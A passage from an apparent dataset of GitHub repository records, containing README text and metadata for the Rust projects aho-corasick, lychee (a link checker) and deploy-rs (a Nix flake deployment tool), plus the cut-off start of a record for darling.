`AhoCorasickBuilder`:\n\n```rust\nuse aho_corasick::{AhoCorasick, PatternID};\n\nlet patterns = &[\"apple\", \"maple\", \"snapple\"];\nlet haystack = \"Nobody likes maple in their apple flavored Snapple.\";\n\nlet ac = AhoCorasick::builder()\n .ascii_case_insensitive(true)\n .build(patterns)\n .unwrap();\nlet mut matches = vec![];\nfor mat in ac.find_iter(haystack) {\n matches.push((mat.pattern(), mat.start(), mat.end()));\n}\nassert_eq!(matches, vec![\n (PatternID::must(1), 13, 18),\n (PatternID::must(0), 28, 33),\n (PatternID::must(2), 43, 50),\n]);\n```\n\n\n### Example: replacing matches in a stream\n\nThis example shows how to execute a search and replace on a stream without\nloading the entire stream into memory first.\n\n```rust,ignore\nuse aho_corasick::AhoCorasick;\n\nlet patterns = &[\"fox\", \"brown\", \"quick\"];\nlet replace_with = &[\"sloth\", \"grey\", \"slow\"];\n\n// In a real example, these might be `std::fs::File`s instead. All you need to\n// do is supply a pair of `std::io::Read` and `std::io::Write` implementations.\nlet rdr = \"The quick brown fox.\";\nlet mut wtr = vec![];\n\nlet ac = AhoCorasick::new(patterns).unwrap();\nac.stream_replace_all(rdr.as_bytes(), &mut wtr, replace_with)\n .expect(\"stream_replace_all failed\");\nassert_eq!(b\"The slow grey sloth.\".to_vec(), wtr);\n```\n\n\n### Example: finding the leftmost first match\n\nIn the textbook description of Aho-Corasick, its formulation is typically\nstructured such that it reports all possible matches, even when they overlap\nwith another. In many cases, overlapping matches may not be desired, such as\nthe case of finding all successive non-overlapping matches like you might with\na standard regular expression.\n\nUnfortunately the \"obvious\" way to modify the Aho-Corasick algorithm to do\nthis doesn't always work in the expected way, since it will report matches as\nsoon as they are seen. For example, consider matching the regex `Samwise|Sam`\nagainst the text `Samwise`. Most regex engines (that are Perl-like, or\nnon-POSIX) will report `Samwise` as a match, but the standard Aho-Corasick\nalgorithm modified for reporting non-overlapping matches will report `Sam`.\n\nA novel contribution of this library is the ability to change the match\nsemantics of Aho-Corasick (without additional search time overhead) such that\n`Samwise` is reported instead. For example, here's the standard approach:\n\n```rust\nuse aho_corasick::AhoCorasick;\n\nlet patterns = &[\"Samwise\", \"Sam\"];\nlet haystack = \"Samwise\";\n\nlet ac = AhoCorasick::new(patterns).unwrap();\nlet mat = ac.find(haystack).expect(\"should have a match\");\nassert_eq!(\"Sam\", &haystack[mat.start()..mat.end()]);\n```\n\nAnd now here's the leftmost-first version, which matches how a Perl-like\nregex will work:\n\n```rust\nuse aho_corasick::{AhoCorasick, MatchKind};\n\nlet patterns = &[\"Samwise\", \"Sam\"];\nlet haystack = \"Samwise\";\n\nlet ac = AhoCorasick::builder()\n .match_kind(MatchKind::LeftmostFirst)\n .build(patterns)\n .unwrap();\nlet mat = ac.find(haystack).expect(\"should have a match\");\nassert_eq!(\"Samwise\", &haystack[mat.start()..mat.end()]);\n```\n\nIn addition to leftmost-first semantics, this library also supports\nleftmost-longest semantics, which match the POSIX behavior of a regular\nexpression alternation. See `MatchKind` in the docs for more details.\n\n\n### Minimum Rust version policy\n\nThis crate's minimum supported `rustc` version is `1.56.1`.\n\nThe current policy is that the minimum Rust version required to use this crate\ncan be increased in minor version updates. For example, if `crate 1.0` requires\nRust 1.20.0, then `crate 1.0.z` for all values of `z` will also require Rust\n1.20.0 or newer. However, `crate 1.y` for `y > 0` may require a newer minimum\nversion of Rust.\n\nIn general, this crate will be conservative with respect to the minimum\nsupported version of Rust.\n\n\n### FFI bindings\n\n* [G-Research/ahocorasick_rs](https://github.com/G-Research/ahocorasick_rs/)\nis a Python wrapper for this library.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lycheeverse/lychee", "link": "https://github.com/lycheeverse/lychee", "tags": ["link-checker", "link-checking", "link-checkers", "validator", "broken-links", "link", "check"], "stars": 692, "description": "\u26a1 Fast, async, stream-based link checker written in Rust. Finds broken URLs and mail addresses inside Markdown, HTML, reStructuredText, websites and more!", "lang": "Rust", "repo_lang": "", "readme": "![lychee](assets/logo.svg)\n\n[![Homepage](https://img.shields.io/badge/Homepage-Online-EA3A97)](https://lycheeverse.github.io)\n[![GitHub Marketplace](https://img.shields.io/badge/Marketplace-lychee-blue.svg?colorA=24292e&colorB=0366d6&style=flat&longCache=true&logo=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAA4AAAAOCAYAAAAfSC3RAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAM6wAADOsB5dZE0gAAABl0RVh0U29mdHdhcmUAd3d3Lmlua3NjYXBlLm9yZ5vuPBoAAAERSURBVCiRhZG/SsMxFEZPfsVJ61jbxaF0cRQRcRJ9hlYn30IHN/+9iquDCOIsblIrOjqKgy5aKoJQj4O3EEtbPwhJbr6Te28CmdSKeqzeqr0YbfVIrTBKakvtOl5dtTkK+v4HfA9PEyBFCY9AGVgCBLaBp1jPAyfAJ/AAdIEG0dNAiyP7+K1qIfMdonZic6+WJoBJvQlvuwDqcXadUuqPA1NKAlexbRTAIMvMOCjTbMwl1LtI/6KWJ5Q6rT6Ht1MA58AX8Apcqqt5r2qhrgAXQC3CZ6i1+KMd9TRu3MvA3aH/fFPnBodb6oe6HM8+lYHrGdRXW8M9bMZtPXUji69lmf5Cmamq7quNLFZXD9Rq7v0Bpc1o/tp0fisAAAAASUVORK5CYII=)](https://github.com/marketplace/actions/lychee-broken-link-checker)\n![Rust](https://github.com/hello-rust/lychee/workflows/CI/badge.svg)\n[![docs.rs](https://docs.rs/lychee-lib/badge.svg)](https://docs.rs/lychee-lib)\n[![Check Links](https://github.com/lycheeverse/lychee/actions/workflows/links.yml/badge.svg)](https://github.com/lycheeverse/lychee/actions/workflows/links.yml)\n[![Docker Pulls](https://img.shields.io/docker/pulls/lycheeverse/lychee?color=%23099cec&logo=Docker)](https://hub.docker.com/r/lycheeverse/lychee)\n\n\u26a1 A fast, async, stream-based link checker written in Rust.\\\nFinds broken hyperlinks and mail addresses inside Markdown, HTML,\nreStructuredText, or any other text file or website!\n\nAvailable as a command-line utility, a library and a [GitHub Action](https://github.com/lycheeverse/lychee-action).\n\n![Lychee demo](./assets/screencast.svg)\n\n## Installation\n\n### Arch Linux\n\n```sh\npacman -S lychee-link-checker\n```\n\n### macOS\n\n```sh\nbrew install lychee\n```\n\n### Docker\n\n```sh\ndocker pull lycheeverse/lychee\n```\n\n### NixOS\n\n```sh\nnix-env -iA nixos.lychee\n```\n\n### FreeBSD\n\n```sh\npkg install lychee\n```\n\n### Scoop\n\n```sh\nscoop install lychee\n```\n\n### Termux\n\n```sh\npkg install lychee\n```\n\n### Pre-built binaries\n\nWe provide binaries for Linux, macOS, and Windows for every release. \\\nYou can download them from the [releases page](https://github.com/lycheeverse/lychee/releases).\n\n### Cargo\n\n#### Build dependencies\n\nOn APT/dpkg-based Linux distros (e.g. Debian, Ubuntu, Linux Mint and Kali Linux)\nthe following commands will install all required build dependencies, including\nthe Rust toolchain and `cargo`:\n\n```sh\ncurl -sSf 'https://sh.rustup.rs' | sh\napt install gcc pkg-config libc6-dev libssl-dev\n```\n\n#### Compile and install lychee\n\n```sh\ncargo install lychee\n```\n\n## Features\n\nThis comparison is made on a best-effort basis. Please create a PR to fix\noutdated information.\n\n| | lychee | [awesome_bot] | [muffet] | [broken-link-checker] | [linkinator] | [linkchecker] | [markdown-link-check] | [fink] |\n| -------------------- | ------- | ------------- | -------- | --------------------- | ------------ | -------------------- | --------------------- | ------ |\n| Language | Rust | Ruby | Go | JS | TypeScript | Python | JS | PHP |\n| Async/Parallel | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] |\n| JSON output | ![yes] | ![no] | ![yes] | ![yes] | ![yes] | ![maybe]1 | ![yes] | ![yes] |\n| Static binary | ![yes] | ![no] | ![yes] | ![no] | ![no] | \ufe0f![no] | ![no] | ![no] |\n| Markdown files | ![yes] | ![yes] | ![no] | ![no] | ![no] | ![yes] | ![yes] | ![no] |\n| HTML files | ![yes] | ![no] | ![no] | ![yes] | ![yes] | ![no] | ![yes] | ![no] |\n| Text files | ![yes] | ![no] | ![no] | ![no] | ![no] | ![no] | ![no] | ![no] |\n| Website support | ![yes] | ![no] | ![yes] | ![yes] | ![yes] | ![yes] | ![no] | ![yes] |\n| Chunked encodings | ![yes] | ![maybe] | ![maybe] | ![maybe] | ![maybe] | ![no] | ![yes] | ![yes] |\n| GZIP compression | ![yes] | ![maybe] | ![maybe] | ![yes] | ![maybe] | ![yes] | ![maybe] | ![no] |\n| Basic Auth | ![yes] | ![no] | ![no] | ![yes] | ![no] | ![yes] | ![no] | ![no] |\n| Custom user agent | ![yes] | ![no] | ![no] | ![yes] | ![no] | ![yes] | ![no] | ![no] |\n| Relative URLs | ![yes] | ![yes] | ![no] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] |\n| Skip relative URLs | ![yes] | ![no] | ![no] | ![maybe] | ![no] | ![no] | ![no] | ![no] |\n| Include patterns | ![yes]\ufe0f | ![yes] | ![no] | ![yes] | ![no] | ![no] | ![no] | ![no] |\n| Exclude patterns | ![yes] | ![no] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] |\n| Handle redirects | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] |\n| Ignore insecure SSL | ![yes] | ![yes] | ![yes] | ![no] | ![no] | ![yes] | ![no] | ![yes] |\n| File globbing | ![yes] | ![yes] | ![no] | ![no] | ![yes] | ![no] | ![yes] | ![no] |\n| Limit scheme | ![yes] | ![no] | ![no] | ![yes] | ![no] | ![yes] | ![no] | ![no] |\n| [Custom headers] | ![yes] | ![no] | ![yes] | ![no] | ![no] | ![no] | ![yes] | ![yes] |\n| Summary | ![yes] | ![yes] | ![yes] | ![maybe] | ![yes] | ![yes] | ![no] | ![yes] |\n| `HEAD` requests | ![yes] | ![yes] | ![no] | ![yes] | ![yes] | ![yes] | ![no] | ![no] |\n| Colored output | ![yes] | ![maybe] | ![yes] | ![maybe] | ![yes] | ![yes] | ![no] | ![yes] |\n| [Filter status code] | ![yes] | ![yes] | ![no] | ![no] | ![no] | ![no] | ![yes] | ![no] |\n| Custom timeout | ![yes] | ![yes] | ![yes] | ![no] | ![yes] | ![yes] | ![no] | ![yes] |\n| E-mail links | ![yes] | ![no] | ![no] | ![no] | ![no] | ![yes] | ![no] | ![no] |\n| Progress bar | ![yes] | ![yes] | ![no] | ![no] | ![no] | ![yes] | ![yes] | ![yes] |\n| Retry and backoff | ![yes] | ![no] | ![no] | ![no] | ![yes] | ![no] | ![yes] | ![no] |\n| Skip private domains | ![yes] | ![no] | ![no] | ![no] | ![no] | ![no] | ![no] | ![no] |\n| [Use as library] | ![yes] | ![yes] | ![no] | ![yes] | ![yes] | ![no] | ![yes] | ![no] |\n| Quiet mode | ![yes] | ![no] | ![no] | ![no] | ![yes] | ![yes] | ![yes] | ![yes] |\n| [Config file] | ![yes] | ![no] | ![no] | ![no] | ![yes] | ![yes] | ![yes] | ![no] |\n| Recursion | ![no] | ![no] | ![yes] | ![yes] | ![yes] | ![yes] | ![yes] | ![no] |\n| Amazing lychee logo | ![yes] | ![no] | ![no] | ![no] | ![no] | ![no] | ![no] | ![no] |\n\n[awesome_bot]: https://github.com/dkhamsing/awesome_bot\n[muffet]: https://github.com/raviqqe/muffet\n[broken-link-checker]: https://github.com/stevenvachon/broken-link-checker\n[linkinator]: https://github.com/JustinBeckwith/linkinator\n[linkchecker]: https://github.com/linkchecker/linkchecker\n[markdown-link-check]: https://github.com/tcort/markdown-link-check\n[fink]: https://github.com/dantleech/fink\n[yes]: ./assets/yes.svg\n[no]: ./assets/no.svg\n[maybe]: ./assets/maybe.svg\n[custom headers]: https://github.com/rust-lang/crates.io/issues/788\n[filter status code]: https://github.com/tcort/markdown-link-check/issues/94\n[skip private domains]: https://github.com/appscodelabs/liche/blob/a5102b0bf90203b467a4f3b4597d22cd83d94f99/url_checker.go\n[use as library]: https://github.com/raviqqe/liche/issues/13\n[config file]: https://github.com/lycheeverse/lychee/blob/master/lychee.example.toml\n\n1 Other machine-readable formats like CSV are supported.\n\n## Commandline usage\n\nRecursively check all links in supported files inside the current directory\n\n```sh\nlychee .\n```\n\nYou can also specify various types of inputs:\n\n```sh\n# check links in specific local file(s):\nlychee README.md\nlychee test.html info.txt\n\n# check links on a website:\nlychee https://endler.dev\n\n# check links in directory but block network requests\nlychee --offline path/to/directory\n\n# check links in a remote file:\nlychee https://raw.githubusercontent.com/lycheeverse/lychee/master/README.md\n\n# check links in local files via shell glob:\nlychee ~/projects/*/README.md\n\n# check links in local files (lychee supports advanced globbing and ~ expansion):\nlychee \"~/projects/big_project/**/README.*\"\n\n# ignore case when globbing and check result for each link:\nlychee --glob-ignore-case --verbose \"~/projects/**/[r]eadme.*\"\n\n# check links from epub file (requires atool: https://www.nongnu.org/atool)\nacat -F zip {file.epub} \"*.xhtml\" \"*.html\" | lychee -\n```\n\nlychee parses other file formats as plaintext and extracts links using [linkify](https://github.com/robinst/linkify).\nThis generally works well if there are no format or encoding specifics,\nbut in case you need dedicated support for a new file format, please consider creating an issue.\n\n### Docker Usage\n\nHere's how to mount a local directory into the container and check some input\nwith lychee. The `--init` parameter is passed so that lychee can be stopped\nfrom the terminal. We also pass `-it` to start an interactive terminal, which\nis required to show the progress bar.\n\n```sh\ndocker run --init -it -v `pwd`:/input lycheeverse/lychee /input/README.md\n```\n\n### GitHub Token\n\nTo avoid getting rate-limited while checking GitHub links, you can optionally\nset an environment variable with your Github token like so `GITHUB_TOKEN=xxxx`,\nor use the `--github-token` CLI option. It can also be set in the config file.\n[Here is an example config file][config file].\n\nThe token can be generated in your\n[GitHub account settings page](https://github.com/settings/tokens). A personal\ntoken with no extra permissions is enough to be able to check public repos links.\n\n### Commandline Parameters\n\nThere is an extensive list of commandline parameters to customize the behavior.\nSee below for a full list.\n\n```text\nA fast, async link checker\n\nFinds broken URLs and mail addresses inside Markdown, HTML, `reStructuredText`, websites and more!\n\nUsage: lychee [OPTIONS] ...\n\nArguments:\n ...\n The inputs (where to get links to check from). These can be: files (e.g. `README.md`), file globs (e.g. `\"~/git/*/README.md\"`), remote URLs (e.g. `https://example.com/README.md`) or standard input (`-`). NOTE: Use `--` to separate inputs from options that allow multiple arguments\n\nOptions:\n -c, --config \n Configuration file to use\n \n [default: ./lychee.toml]\n\n -v, --verbose...\n Set verbosity level; more output per occurrence (e.g. `-v` or `-vv`)\n\n -q, --quiet...\n Less output per occurrence (e.g. `-q` or `-qq`)\n\n -n, --no-progress\n Do not show progress bar.\n This is recommended for non-interactive shells (e.g. for continuous integration)\n\n --cache\n Use request cache stored on disk at `.lycheecache`\n\n --max-cache-age \n Discard all cached requests older than this duration\n \n [default: 1d]\n\n --dump\n Don't perform any link checking. Instead, dump all the links extracted from inputs that would be checked\n\n -m, --max-redirects \n Maximum number of allowed redirects\n \n [default: 5]\n\n --max-retries \n Maximum number of retries per request\n \n [default: 3]\n\n --max-concurrency \n Maximum number of concurrent network requests\n \n [default: 128]\n\n -T, --threads \n Number of threads to utilize. Defaults to number of cores available to the system\n\n -u, --user-agent \n User agent\n \n [default: lychee/0.10.3]\n\n -i, --insecure\n Proceed for server connections considered insecure (invalid TLS)\n\n -s, --scheme \n Only test links with the given schemes (e.g. http and https)\n\n --offline\n Only check local files and block network requests\n\n --include \n URLs to check (supports regex). Has preference over all excludes\n\n --exclude \n Exclude URLs and mail addresses from checking (supports regex)\n\n --exclude-file \n Deprecated; use `--exclude-path` instead\n\n --exclude-path \n Exclude file path from getting checked\n\n -E, --exclude-all-private\n Exclude all private IPs from checking.\n Equivalent to `--exclude-private --exclude-link-local --exclude-loopback`\n\n --exclude-private\n Exclude private IP address ranges from checking\n\n --exclude-link-local\n Exclude link-local IP address range from checking\n\n --exclude-loopback\n Exclude loopback IP address range and localhost from checking\n\n --exclude-mail\n Exclude all mail addresses from checking\n\n --remap \n Remap URI matching pattern to different URI\n\n --header
\n Custom request header\n\n -a, --accept \n Comma-separated list of accepted status codes for valid links\n\n -t, --timeout \n Website timeout in seconds from connect to response finished\n \n [default: 20]\n\n -r, --retry-wait-time \n Minimum wait time in seconds between retries of failed requests\n \n [default: 1]\n\n -X, --method \n Request method\n \n [default: get]\n\n -b, --base \n Base URL or website root directory to check relative URLs e.g. https://example.com or `/path/to/public`\n\n --basic-auth \n Basic authentication support. E.g. `username:password`\n\n --github-token \n GitHub API token to use when checking github.com links, to avoid rate limiting\n \n [env: GITHUB_TOKEN]\n\n --skip-missing\n Skip missing input files (default is to error if they don't exist)\n\n --include-verbatim\n Find links in verbatim sections like `pre`- and `code` blocks\n\n --glob-ignore-case\n Ignore case when expanding filesystem path glob inputs\n\n -o, --output \n Output file of status report\n\n -f, --format \n Output format of final status report (compact, detailed, json, markdown)\n \n [default: compact]\n\n --require-https\n When HTTPS is available, treat HTTP links as errors\n\n -h, --help\n Print help (see a summary with '-h')\n\n -V, --version\n Print version\n\n```\n\n### Exit codes\n\n- `0` for success (all links checked successfully or excluded/skipped as configured)\n- `1` for missing inputs and any unexpected runtime failures or config errors\n- `2` for link check failures (if any non-excluded link failed the check)\n\n### Ignoring links\n\nYou can exclude links from getting checked by specifying regex patterns\nwith `--exclude` (e.g. `--exclude example\\.(com|org)`).\nIf a file named `.lycheeignore` exists in the current working directory, its\ncontents are excluded as well. The file allows you to list multiple regular\nexpressions for exclusion (one pattern per line).\n\nFor excluding files/directories from being scanned use `lychee.toml`\nand `exclude_path`.\n\n```toml\nexclude_path = [\"some/path\", \"*/dev/*\"]\n```\n\n### Caching\n\nIf the `--cache` flag is set, lychee will cache responses in a file called\n`.lycheecache` in the current directory. If the file exists and the flag is set,\nthen the cache will be loaded on startup. This can greatly speed up future runs.\nNote that by default lychee will not store any data on disk.\n\n## Library usage\n\nYou can use lychee as a library for your own projects!\nHere is a \"hello world\" example:\n\n```rust\nuse lychee_lib::Result;\n\n#[tokio::main]\nasync fn main() -> Result<()> {\n let response = lychee_lib::check(\"https://github.com/lycheeverse/lychee\").await?;\n println!(\"{response}\");\n Ok(())\n}\n```\n\nThis is equivalent to the following snippet, in which we build our own client:\n\n```rust\nuse lychee_lib::{ClientBuilder, Result, Status};\n\n#[tokio::main]\nasync fn main() -> Result<()> {\n let client = ClientBuilder::default().client()?;\n let response = client.check(\"https://github.com/lycheeverse/lychee\").await?;\n assert!(response.status().is_success());\n Ok(())\n}\n```\n\nThe client builder is very customizable:\n\n```rust, ignore\nlet client = lychee_lib::ClientBuilder::builder()\n .includes(includes)\n .excludes(excludes)\n .max_redirects(cfg.max_redirects)\n .user_agent(cfg.user_agent)\n .allow_insecure(cfg.insecure)\n .custom_headers(headers)\n .method(method)\n .timeout(timeout)\n .github_token(cfg.github_token)\n .scheme(cfg.scheme)\n .accepted(accepted)\n .build()\n .client()?;\n```\n\nAll options that you set will be used for all link checks.\nSee the [builder\ndocumentation](https://docs.rs/lychee-lib/latest/lychee_lib/struct.ClientBuilder.html)\nfor all options. For more information, check out the [examples](examples)\nfolder.\n\n## GitHub Action Usage\n\nA GitHub Action that uses lychee is available as a separate repository: [lycheeverse/lychee-action](https://github.com/lycheeverse/lychee-action)\nwhich includes usage instructions.\n\n## Contributing to lychee\n\nWe'd be thankful for any contribution. \\\nWe try to keep the issue-tracker up-to-date so you can quickly find a task to work on.\n\nTry one of these links to get started:\n\n- [good first issues](https://github.com/lycheeverse/lychee/issues?q=is%3Aissue+is%3Aopen+label%3A%22good+first+issue%22)\n- [help wanted](https://github.com/lycheeverse/lychee/issues?q=is%3Aissue+is%3Aopen+label%3A%22help+wanted%22)\n\nFor more detailed instructions, head over to [`CONTRIBUTING.md`](/CONTRIBUTING.md).\n\n## Debugging and improving async code\n\nLychee makes heavy use of async code to be resource-friendly while still being\nperformant. Async code can be difficult to troubleshoot with most tools,\nhowever. Therefore we provide experimental support for\n[tokio-console](https://github.com/tokio-rs/console). It provides a top(1)-like\noverview for async tasks!\n\nIf you want to give it a spin, download and start the console:\n\n```sh\ngit clone https://github.com/tokio-rs/console\ncd console\ncargo run\n```\n\nThen run lychee with some special flags and features enabled.\n\n```sh\nRUSTFLAGS=\"--cfg tokio_unstable\" cargo run --features tokio-console -- ...\n```\n\nIf you find a way to make lychee faster, please do reach out.\n\n## Troubleshooting and Workarounds\n\nWe collect a list of common workarounds for various websites in our [troubleshooting guide](./docs/TROUBLESHOOTING.md).\n\n## Users\n\n- https://github.com/InnerSourceCommons/InnerSourcePatterns\n- https://github.com/opensearch-project/OpenSearch\n- https://github.com/ramitsurana/awesome-kubernetes\n- https://github.com/papers-we-love/papers-we-love\n- https://github.com/pingcap/docs\n- https://github.com/microsoft/WhatTheHack\n- https://github.com/Azure/ResourceModules\n- https://github.com/nix-community/awesome-nix\n- https://github.com/balena-io/docs\n- https://github.com/launchdarkly/LaunchDarkly-Docs\n- https://github.com/pawroman/links\n- https://github.com/analysis-tools-dev/static-analysis\n- https://github.com/analysis-tools-dev/dynamic-analysis\n- https://github.com/mre/idiomatic-rust\n- https://github.com/lycheeverse/lychee (yes, the lychee docs are checked with lychee \ud83e\udd2f)\n\nIf you are using lychee for your project, **please add it here**.\n\n## Credits\n\nThe first prototype of lychee was built in [episode 10 of Hello\nRust](https://hello-rust.show/10/). Thanks to all Github- and Patreon sponsors\nfor supporting the development since the beginning. Also, thanks to all the\ngreat contributors who have since made this project more mature.\n\n## License\n\nlychee is licensed under either of\n\n- Apache License, Version 2.0, (LICENSE-APACHE or\n https://www.apache.org/licenses/LICENSE-2.0)\n- MIT license (LICENSE-MIT or https://opensource.org/licenses/MIT)\n\nat your option.\n", "readme_type": "markdown", "hn_comments": "feature rich tool that seems to work fine and fast, so fast that HN starts blocking requests almost immediately. also great to see a windows executable available.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "serokell/deploy-rs", "link": "https://github.com/serokell/deploy-rs", "tags": ["nix", "nixos", "deployment", "nix-flake", "flakes", "tool"], "stars": 689, "description": "A simple multi-profile Nix-flake deploy tool.", "lang": "Rust", "repo_lang": "", "readme": "\n\n![deploy-rs logo](./docs/logo.svg \"deploy-rs\")\n\n---\n\nA Simple, multi-profile Nix-flake deploy tool.\n\nQuestions? Need help? Join us on Matrix: [`#deploy-rs:matrix.org`](https://matrix.to/#/#deploy-rs:matrix.org)\n\n## Usage\n\nBasic usage: `deploy [options] `.\n\nUsing this method all profiles specified in the given `` will be deployed (taking into account the [`profilesOrder`](#node)).\n\n Optionally the flake can be constrained to deploy just a single node (`my-flake#my-node`) or a profile (`my-flake#my-node.my-profile`).\n\nIf your profile or node name has a . in it, simply wrap it in quotes, and the flake path in quotes (to avoid shell escaping), for example 'my-flake#\"myserver.com\".system'.\n\nAny \"extra\" arguments will be passed into the Nix calls, so for instance to deploy an impure profile, you may use `deploy . -- --impure` (note the explicit flake path is necessary for doing this).\n\nYou can try out this tool easily with `nix run`:\n- `nix run github:serokell/deploy-rs your-flake`\n\nIf you want to deploy multiple flakes or a subset of profiles with one invocation, instead of calling `deploy ` you can issue `deploy --targets [ ...]` where `` is supposed to take the same format as discussed before.\n\nRunning in this mode, if any of the deploys fails, the deploy will be aborted and all successful deploys rolled back. `--rollback-succeeded false` can be used to override this behavior, otherwise the `auto-rollback` argument takes precedent.\n\nIf you require a signing key to push closures to your server, specify the path to it in the `LOCAL_KEY` environment variable.\n\nCheck out `deploy --help` for CLI flags! Remember to check there before making one-time changes to things like hostnames.\n\nThere is also an `activate` binary though this should be ignored, it is only used internally (on the deployed system) and for testing/hacking purposes.\n\n## Ideas\n\n`deploy-rs` is a simple Rust program that will take a Nix flake and use it to deploy any of your defined profiles to your nodes. This is _strongly_ based off of [serokell/deploy](https://github.com/serokell/deploy), designed to replace it and expand upon it.\n\n### Multi-profile\n\nThis type of design (as opposed to more traditional tools like NixOps or morph) allows for lesser-privileged deployments, and the ability to update different things independently of eachother. You can deploy any type of profile to any user, not just a NixOS profile to `root`.\n\n### Magic Rollback\n\nThere is a built-in feature to prevent you making changes that might render your machine unconnectable or unusuable, which works by connecting to the machine after profile activation to confirm the machine is still available, and instructing the target node to automatically roll back if it is not confirmed. If you do not disable `magicRollback` in your configuration (see later sections) or with the CLI flag, you will be unable to make changes to the system which will affect you connecting to it (changing SSH port, changing your IP, etc).\n\n## API\n\n### Overall usage\n\n`deploy-rs` is designed to be used with Nix flakes (this currently requires an unstable version of Nix to work with). There is a Flake-less mode of operation which will automatically be used if your available Nix version does not support flakes, however you will likely want to use a flake anyway, just with `flake-compat` (see [this wiki page](https://nixos.wiki/wiki/Flakes) for usage).\n\n`deploy-rs` also outputs a `lib` attribute, with tools used to make your definitions simpler and safer, including `deploy-rs.lib.${system}.activate` (see later section \"Profile\"), and `deploy-rs.lib.${system}.deployChecks` which will let `nix flake check` ensure your deployment is defined correctly.\n\nThere are full working deploy-rs Nix expressions in the [examples folder](./examples), and there is a JSON schema [here](./interface.json) which is used internally by the `deployChecks` mentioned above to validate your expressions.\n\nA basic example of a flake that works with `deploy-rs` and deploys a simple NixOS configuration could look like this\n\n```nix\n{\n description = \"Deployment for my server cluster\";\n\n # For accessing `deploy-rs`'s utility Nix functions\n inputs.deploy-rs.url = \"github:serokell/deploy-rs\";\n\n outputs = { self, nixpkgs, deploy-rs }: {\n nixosConfigurations.some-random-system = nixpkgs.lib.nixosSystem {\n system = \"x86_64-linux\";\n modules = [ ./some-random-system/configuration.nix ];\n };\n\n deploy.nodes.some-random-system.profiles.system = {\n user = \"root\";\n path = deploy-rs.lib.x86_64-linux.activate.nixos self.nixosConfigurations.some-random-system;\n };\n\n # This is highly advised, and will prevent many possible mistakes\n checks = builtins.mapAttrs (system: deployLib: deployLib.deployChecks self.deploy) deploy-rs.lib;\n };\n}\n```\n\n### Profile\n\nThis is the core of how `deploy-rs` was designed, any number of these can run on a node, as any user (see further down for specifying user information). If you want to mimic the behaviour of traditional tools like NixOps or Morph, try just defining one `profile` called `system`, as root, containing a nixosSystem, and you can even similarly use [home-manager](https://github.com/nix-community/home-manager) on any non-privileged user.\n\n```nix\n{\n # A derivation containing your required software, and a script to activate it in `${path}/deploy-rs-activate`\n # For ease of use, `deploy-rs` provides a function to easily add the required activation script to any derivation\n # Both the working directory and `$PROFILE` will point to `profilePath`\n path = deploy-rs.lib.x86_64-linux.activate.custom pkgs.hello \"./bin/hello\";\n\n # An optional path to where your profile should be installed to, this is useful if you want to use a common profile name across multiple users, but would have conflicts in your node's profile list.\n # This will default to `\"/nix/var/nix/profiles/$PROFILE_NAME` if `user` is root (see: generic options), and `/nix/var/nix/profiles/per-user/$USER/$PROFILE_NAME` if it is not.\n profilePath = \"/nix/var/nix/profiles/per-user/someuser/someprofile\";\n\n # ...generic options... (see lower section)\n}\n```\n\n### Node\n\nThis defines a single node/server, and the profiles you intend it to run.\n\n```nix\n{\n # The hostname of your server. Can be overridden at invocation time with a flag.\n hostname = \"my.server.gov\";\n\n # An optional list containing the order you want profiles to be deployed.\n # This will take effect whenever you run `deploy` without specifying a profile, causing it to deploy every profile automatically.\n # Any profiles not in this list will still be deployed (in an arbitrary order) after those which are listed\n profilesOrder = [ \"something\" \"system\" ];\n\n profiles = {\n # Definition format shown above\n system = {};\n something = {};\n };\n\n # ...generic options... (see lower section)\n}\n```\n\n### Deploy\n\nThis is the top level attribute containing all of the options for this tool\n\n```nix\n{\n nodes = {\n # Definition format shown above\n my-node = {};\n another-node = {};\n };\n\n # ...generic options... (see lower section)\n}\n```\n\n### Generic options\n\nThis is a set of options that can be put in any of the above definitions, with the priority being `profile > node > deploy`\n\n```nix\n{\n # This is the user that deploy-rs will use when connecting.\n # This will default to your own username if not specified anywhere\n sshUser = \"admin\";\n\n # This is the user that the profile will be deployed to (will use sudo if not the same as above).\n # If `sshUser` is specified, this will be the default (though it will _not_ default to your own username)\n user = \"root\";\n\n # Which sudo command to use. Must accept at least two arguments:\n # the user name to execute commands as and the rest is the command to execute\n # This will default to \"sudo -u\" if not specified anywhere.\n sudo = \"doas -u\";\n\n # This is an optional list of arguments that will be passed to SSH.\n sshOpts = [ \"-p\" \"2121\" ];\n\n # Fast connection to the node. If this is true, copy the whole closure instead of letting the node substitute.\n # This defaults to `false`\n fastConnection = false;\n\n # If the previous profile should be re-activated if activation fails.\n # This defaults to `true`\n autoRollback = true;\n\n # See the earlier section about Magic Rollback for more information.\n # This defaults to `true`\n magicRollback = true;\n\n # The path which deploy-rs will use for temporary files, this is currently only used by `magicRollback` to create an inotify watcher in for confirmations\n # If not specified, this will default to `/tmp`\n # (if `magicRollback` is in use, this _must_ be writable by `user`)\n tempPath = \"/home/someuser/.deploy-rs\";\n\n # Build the derivation on the target system. \n # Will also fetch all external dependencies from the target system's substituters.\n # This default to `false`\n remoteBuild = true;\n}\n```\n\n## About Serokell\n\ndeploy-rs is maintained and funded with \u2764\ufe0f by [Serokell](https://serokell.io/).\nThe names and logo for Serokell are trademark of Serokell O\u00dc.\n\nWe love open source software! See [our other projects](https://serokell.io/community?utm_source=github) or [hire us](https://serokell.io/hire-us?utm_source=github) to design, develop and grow your idea!\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TedDriggs/darling", "link": "https://github.com/TedDriggs/darling", "tags": ["rust", "proc-macro"], "stars": 688, "description": "A Rust proc-macro attribute parser", "lang": "Rust", "repo_lang": "", "readme": "Darling\n=======\n\n[![Build Status](https://github.com/TedDriggs/darling/workflows/CI/badge.svg)](https://github.com/TedDriggs/darling/actions)\n[![Latest Version](https://img.shields.io/crates/v/darling.svg)](https://crates.io/crates/darling)\n[![Rustc Version 